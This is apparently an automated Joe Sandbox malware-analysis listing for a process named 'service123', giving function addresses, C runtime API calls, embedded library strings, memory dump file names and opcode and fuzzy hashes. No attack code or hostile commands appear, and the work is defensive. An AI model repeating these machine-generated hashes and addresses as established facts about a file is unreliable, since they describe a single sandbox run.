Function 6C311A00 Relevance: 9.0, APIs: 6, Instructions: 49stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C311A18
strlen.MSVCRT ref: 6C311A22
memcpy.MSVCRT ref: 6C311A3F
setlocale.MSVCRT ref: 6C311A52
strftime.MSVCRT ref: 6C311A76
setlocale.MSVCRT ref: 6C311A88

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: setlocale$memcpystrftimestrlen
String ID:
API String ID: 1843691881-0
Opcode ID: 5921bce16b2b149da0e5d95dd047887597348383fbd26cb02bf93ddb50e0a5a7
Instruction ID: 0384c36a9facb1789d711d53230267700307bb0e2f3ba9d256c4ba5617d1c941
Opcode Fuzzy Hash: 5921bce16b2b149da0e5d95dd047887597348383fbd26cb02bf93ddb50e0a5a7
Instruction Fuzzy Hash: CC11CEB1A09310AFC340AF68C48579EBBE4BF88644F458C2EE4C98B701E7789844CF93

Function 6C2FED31 Relevance: 9.0, APIs: 6, Instructions: 19COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D65
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D7E

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 43ff2732fdef0f94484c1c8e9571a78a07aad364bf0272b15e68b5917b8ab3da
Instruction ID: 5ea248cf3b37e04ac2d9ec2e16310a58dd1c7e69529847f1b9b85891eefce67f
Opcode Fuzzy Hash: 43ff2732fdef0f94484c1c8e9571a78a07aad364bf0272b15e68b5917b8ab3da
Instruction Fuzzy Hash: 60B09232AD826D85C42069AC00253AAE21D9702348F40080A99B663C088652A4874A57

Function 6C30DE80 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 130windowCOMMON

Download Yara Rule

APIs

FormatMessageA.KERNEL32 ref: 6C30DEC7
LocalFree.KERNEL32 ref: 6C30DEFB

Strings

Unknown error code, xrefs: 6C30DF3C
basic_string: construction from null is not valid, xrefs: 6C30DF57

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: FormatFreeLocalMessage
String ID: Unknown error code$basic_string: construction from null is not valid
API String ID: 1427518018-3299438129
Opcode ID: e5a1186ba5fcb05a4fa42662d23fea959a2a5165cabb27a263e2302c859400a9
Instruction ID: dcc7a5fe3e511803ab9d64ae75eb84e008f9fc12149860676305316debaa12a0
Opcode Fuzzy Hash: e5a1186ba5fcb05a4fa42662d23fea959a2a5165cabb27a263e2302c859400a9
Instruction Fuzzy Hash: 364158B6A047049BCB00AF69C4866AEFBF4FF85314F41882CE5C59BB14D77198898F93

Function 00532F89 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 00532E97
fputc.MSVCRT ref: 00532F07
memset.MSVCRT ref: 00532FC2

Strings

0, xrefs: 00532FB7
o, xrefs: 00532FCA

Memory Dump Source

Source File: 00000004.00000002.2936168593.0000000000531000.00000020.00000001.01000000.00000005.sdmp, Offset: 00530000, based on PE: true

Associated: 00000004.00000002.2936139701.0000000000530000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936188368.000000000053A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936205429.000000000053E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936222214.0000000000541000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_530000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: 0$o
API String ID: 2944404495-4157579757
Opcode ID: 448672419a6aefb592f870ea4cfb86913ff9ea238fa630640188f8821d0f5d8b
Instruction ID: d7ba43ce7d8d93c9c4c43ea38c279c03c552ce0bf80268833fb6fadde76884c4
Opcode Fuzzy Hash: 448672419a6aefb592f870ea4cfb86913ff9ea238fa630640188f8821d0f5d8b
Instruction Fuzzy Hash: F7316971A04B05CFCB14CF68C0857AABFF5BF58310F158A29D999AB342D338E900DB50

Function 6C303659 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6C303567
fputc.MSVCRT ref: 6C3035D7
memset.MSVCRT ref: 6C303692

Strings

0, xrefs: 6C303687
o, xrefs: 6C30369A

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: 0$o
API String ID: 2944404495-4157579757
Opcode ID: 4e5d1ba6c8a4e8df9e646095398d9879c6dbcde4af08328c22bcc6dcc1e4ca11
Instruction ID: 5224eee9a5d75226ec0bfff4f3ed499df9122ca52c3afa853115b338c275eeeb
Opcode Fuzzy Hash: 4e5d1ba6c8a4e8df9e646095398d9879c6dbcde4af08328c22bcc6dcc1e4ca11
Instruction Fuzzy Hash: 6A315972A093058BCB40CF69C080BAAB7F5BF49318F158669D995ABB51E339E804CF50

Function 6C2F9490 Relevance: 7.9, APIs: 4, Strings: 1, Instructions: 375stringCOMMON

Download Yara Rule

APIs

strncmp.MSVCRT ref: 6C2F94C2
strlen.MSVCRT ref: 6C2F9616

Strings

_GLOBAL_, xrefs: 6C2F94B7

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: strlenstrncmp
String ID: _GLOBAL_
API String ID: 1310274236-770460502
Opcode ID: 3a50b6347ae4830498885e7f05993cb41b99398b3e5207a7065f289daea30cb9
Instruction ID: 4da606ea1b397b15f0856919f4a1365a62f23519826ecb86ad0d7daf114c9a6f
Opcode Fuzzy Hash: 3a50b6347ae4830498885e7f05993cb41b99398b3e5207a7065f289daea30cb9
Instruction Fuzzy Hash: E3F18EB0D4421D8FEB10DF29C8903DDFBF1AF46308F0441AAD869AB645D7759A9ACF81

Function 6C36D860 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 229COMMON

Download Yara Rule

APIs

Part of subcall function 6C38F670: memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C36D7DE), ref: 6C38F70D
Part of subcall function 6C38F670: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C36D7DE), ref: 6C38F738

memcpy.MSVCRT ref: 6C36DA65

Part of subcall function 6C3922E0: memcpy.MSVCRT(?,-00000001,?,6C31724E,?,?,?,?,?,?,?,?,?,?,?,6C318BD5), ref: 6C39231C

Strings

iostream error, xrefs: 6C36DAB8
Unknown error, xrefs: 6C36D8B8
basic_string::append, xrefs: 6C36DB62, 6C36DB6E

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: memcpy$memmove
String ID: Unknown error$basic_string::append$iostream error
API String ID: 1283327689-1474074352
Opcode ID: 6e40d075857a343bb4cf2972729c3dcfcbc578a0dedd8be22a9fcc3f87d10702
Instruction ID: a2eac48222ea64b640bbb70b33d3fd0a3f0ef288c9debd68f4fda749453b8d99
Opcode Fuzzy Hash: 6e40d075857a343bb4cf2972729c3dcfcbc578a0dedd8be22a9fcc3f87d10702
Instruction Fuzzy Hash: D5A11375D083188BCB10DFA9C48069DBBF5BF48314F25892ED895ABB58E731A845CF92

Function 6C35BD10 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 216COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C35BDEF
memcpy.MSVCRT ref: 6C35BE49
memcpy.MSVCRT ref: 6C35BED7

Part of subcall function 6C35C2B0: memcpy.MSVCRT ref: 6C35C33C

Strings

basic_string::replace, xrefs: 6C35BF44, 6C35BF57
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C35BF63

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::replace
API String ID: 3510742995-3564965661
Opcode ID: 219f4bb9f2e17187ed1271bc4d8216d71cb77e7b5e5e6223dc237ee68a3df5f9
Instruction ID: caff6d54cb6ff31eff002995253c7b81211efa63783e1a5658c3f304653e3c4b
Opcode Fuzzy Hash: 219f4bb9f2e17187ed1271bc4d8216d71cb77e7b5e5e6223dc237ee68a3df5f9
Instruction Fuzzy Hash: 7C815872A056199FCB00DF29C48099EBBF1FF88358F55892EE8989B710D731D964CF92

Function 6C364DB0 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 205COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C364E80
memcpy.MSVCRT ref: 6C364ED4
memcpy.MSVCRT ref: 6C364F68

Part of subcall function 6C365340: memcpy.MSVCRT ref: 6C3653D0

Strings

basic_string::replace, xrefs: 6C364FD9, 6C364FEC
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C364FF8

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::replace
API String ID: 3510742995-3564965661
Opcode ID: 4b0b01bdd932abdef03a19c347f0e9bab92301f19bdb525da1814954e10e7588
Instruction ID: dd2870cfd144f005b65ca4d3fea6cc8fd7f5391376e4faab7d08279bb3be2795
Opcode Fuzzy Hash: 4b0b01bdd932abdef03a19c347f0e9bab92301f19bdb525da1814954e10e7588
Instruction Fuzzy Hash: E1814675A082059FCB00DF2AC49059EBBF5AF89254F10C92EE898DBB18D731D8548F92

Function 6C36D5C0 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 153stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C38F670: memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C36D7DE), ref: 6C38F70D
Part of subcall function 6C38F670: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C36D7DE), ref: 6C38F738

strlen.MSVCRT ref: 6C36D695
memcpy.MSVCRT ref: 6C36D76E

Strings

iostream error, xrefs: 6C36D7C2
Unknown error, xrefs: 6C36D60E

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: memcpy$memmovestrlen
String ID: Unknown error$iostream error
API String ID: 1234831610-3609051425
Opcode ID: 656adcb80a648914b27c50ebe42bab209e5724783d029611f05306f08324a4a8
Instruction ID: 14df1e1842959161246362e448754a813ae5dae1877e07a541b79d9ab3b59bcf
Opcode Fuzzy Hash: 656adcb80a648914b27c50ebe42bab209e5724783d029611f05306f08324a4a8
Instruction Fuzzy Hash: BE61D5B49043089FCB04DFA9C48469EFBF1BF88314F24892ED4999B759E7759848CF92

Function 6C2FF840 Relevance: 7.6, APIs: 5, Instructions: 87COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6C2FF85F
ReleaseSemaphore.KERNEL32 ref: 6C2FF8E3

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: ReleaseSemaphoremalloc
String ID:
API String ID: 755742884-0
Opcode ID: c0086c0008e5ff5ccc2dcbacf9d4de7f085185868df4f59bb58e7721831c33d4
Instruction ID: 3354a554e6fea395ebdf1298df47e02952e05d969f4515107c7f15ad8390661d
Opcode Fuzzy Hash: c0086c0008e5ff5ccc2dcbacf9d4de7f085185868df4f59bb58e7721831c33d4
Instruction Fuzzy Hash: C8316D706493098FDB00EF29C54975BBBF4BB46319F05865CE8A847B80D335E646CB92

Function 6C2FFCE0 Relevance: 7.6, APIs: 5, Instructions: 78synchronizationCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6C2FFCEC
ReleaseSemaphore.KERNEL32 ref: 6C2FFD7C
CreateSemaphoreW.KERNEL32 ref: 6C2FFDC7
WaitForSingleObject.KERNEL32 ref: 6C2FFE10

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: Semaphore$CreateObjectReleaseSingleWaitmalloc
String ID:
API String ID: 2768075653-0
Opcode ID: a7bd63777cd46b3ffc61caa84bebda68dbfec96a008d83ffe0a82beb58ef5936
Instruction ID: 8d9580e23bb0ac9ec806b08915f6d35b9219f7a5c26d70ee1e4acc1f792cef5e
Opcode Fuzzy Hash: a7bd63777cd46b3ffc61caa84bebda68dbfec96a008d83ffe0a82beb58ef5936
Instruction Fuzzy Hash: 76312D746493098FDB00EF2DC54975BBBF4BB06319F11865CE8A887680D335E546CFA2

Function 6C3B82D0 Relevance: 7.6, APIs: 5, Instructions: 64stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C3B82E5
strlen.MSVCRT ref: 6C3B8333
memcpy.MSVCRT ref: 6C3B8350
setlocale.MSVCRT ref: 6C3B8364
setlocale.MSVCRT ref: 6C3B839A

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: setlocale$memcpystrlen
String ID:
API String ID: 4096897932-0
Opcode ID: 9640b2ce7b6764cf9104c25e84169718861fdbd600a80d84f91e885c06c699cf
Instruction ID: 38448d103e669809b3bb64130c19343fa3d866e8690e955767bfc095a344465d
Opcode Fuzzy Hash: 9640b2ce7b6764cf9104c25e84169718861fdbd600a80d84f91e885c06c699cf
Instruction Fuzzy Hash: E521F0B5A083509FD340EF28D48069EFBE4AF88258F45892EE5C887701E738C9448F83

Function 6C309530 Relevance: 7.6, APIs: 5, Instructions: 59COMMON

Download Yara Rule

APIs

_lock.MSVCRT ref: 6C309549
_unlock.MSVCRT ref: 6C309571
calloc.MSVCRT ref: 6C3095BF

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: _lock_unlockcalloc
String ID:
API String ID: 3876498383-0
Opcode ID: 2d85fe9eb4c66546544eacb675d5450fb1bd51e5c271a4006a92a239dbcf87c3
Instruction ID: 704171e4088aa9a9cbf9b9ce048f5b4fe45ad88a9bc5fa32e4ed192bd6c4b255
Opcode Fuzzy Hash: 2d85fe9eb4c66546544eacb675d5450fb1bd51e5c271a4006a92a239dbcf87c3
Instruction Fuzzy Hash: 791149726053118FDB40AF29C480796BBE4BF85348F158AA9D898CF745EB35D844CFA2

Function 6C300290 Relevance: 7.5, APIs: 5, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

CreateSemaphoreW.KERNEL32 ref: 6C3002BC
TlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C3004DE), ref: 6C3002CA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C3004DE), ref: 6C300300

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: AllocCreateErrorLastSemaphore
String ID:
API String ID: 2256031600-0
Opcode ID: f6411f139b242dcc093ce6f34f57bb8bb5cf7157e44450fc065661e1dd177e01
Instruction ID: 5a4e4f4ba22fbf3d25c5aed23d62f9822f75bde280082355c9ca5727656ce265
Opcode Fuzzy Hash: f6411f139b242dcc093ce6f34f57bb8bb5cf7157e44450fc065661e1dd177e01
Instruction Fuzzy Hash: DCF0DAB16493419FD700BF68C54A36A7EB0BB42328F504A5CE4E987A90E77A4048CF53

Function 00534BFA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 242COMMON

Download Yara Rule

Strings

(null), xrefs: 00534C27
@, xrefs: 00534647

Memory Dump Source

Source File: 00000004.00000002.2936168593.0000000000531000.00000020.00000001.01000000.00000005.sdmp, Offset: 00530000, based on PE: true

Associated: 00000004.00000002.2936139701.0000000000530000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936188368.000000000053A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936205429.000000000053E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936222214.0000000000541000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_530000_service123.jbxd

Similarity

API ID:
String ID: (null)$@
API String ID: 0-1380778734
Opcode ID: 2b9e0b0de12b378222a0bcb27d8f4f98732afb52c50e65fb5b88ce1d565bf905
Instruction ID: 63ef0533a8f1fdee37035bf4dbd9a61d29974c058ea3b2628a10b4b08aaf1578
Opcode Fuzzy Hash: 2b9e0b0de12b378222a0bcb27d8f4f98732afb52c50e65fb5b88ce1d565bf905
Instruction Fuzzy Hash: 56A18C356083968BDB319F24D0907AABFE1BF85314F148A1DE8D897342D735E94ADF82

Function 6C3052CA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 242COMMON

Download Yara Rule

Strings

@, xrefs: 6C304D17
(null), xrefs: 6C3052F7

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID: (null)$@
API String ID: 0-1380778734
Opcode ID: e55d54e9bba893e9108db828795165533ea6299e36a3e15af777f6383326850a
Instruction ID: 9baff55b0a6bedb942ca8436dba3ba342f644ef4b37ea2065f2ddc16629ccb85
Opcode Fuzzy Hash: e55d54e9bba893e9108db828795165533ea6299e36a3e15af777f6383326850a
Instruction Fuzzy Hash: 99A18A7270C3958BD721DE24C09039ABBE5BF85308F148A5DE8D88B741D736DA0ACF82

Function 00531B00 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 211COMMON

Download Yara Rule

Strings

Unknown pseudo relocation protocol version %d., xrefs: 00531DF3
Unknown pseudo relocation bit size %d., xrefs: 00531C6D
%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00531C20

